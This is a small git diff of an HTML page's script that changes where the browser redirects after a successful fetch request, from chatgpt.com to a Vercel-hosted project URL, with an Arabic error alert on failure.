--- a/index.html
+++ b/index.html
@@ -83,7 +83,7 @@
 
       fetch(url).then(response => {
         if (response.ok) {
-          window.location.href = "https://chatgpt.com";
+          window.location.href = "https://feroxy-sripqs-projects.vercel.app";
         } else {
           alert("حدث خطأ أثناء الإرسال ❌");
         }
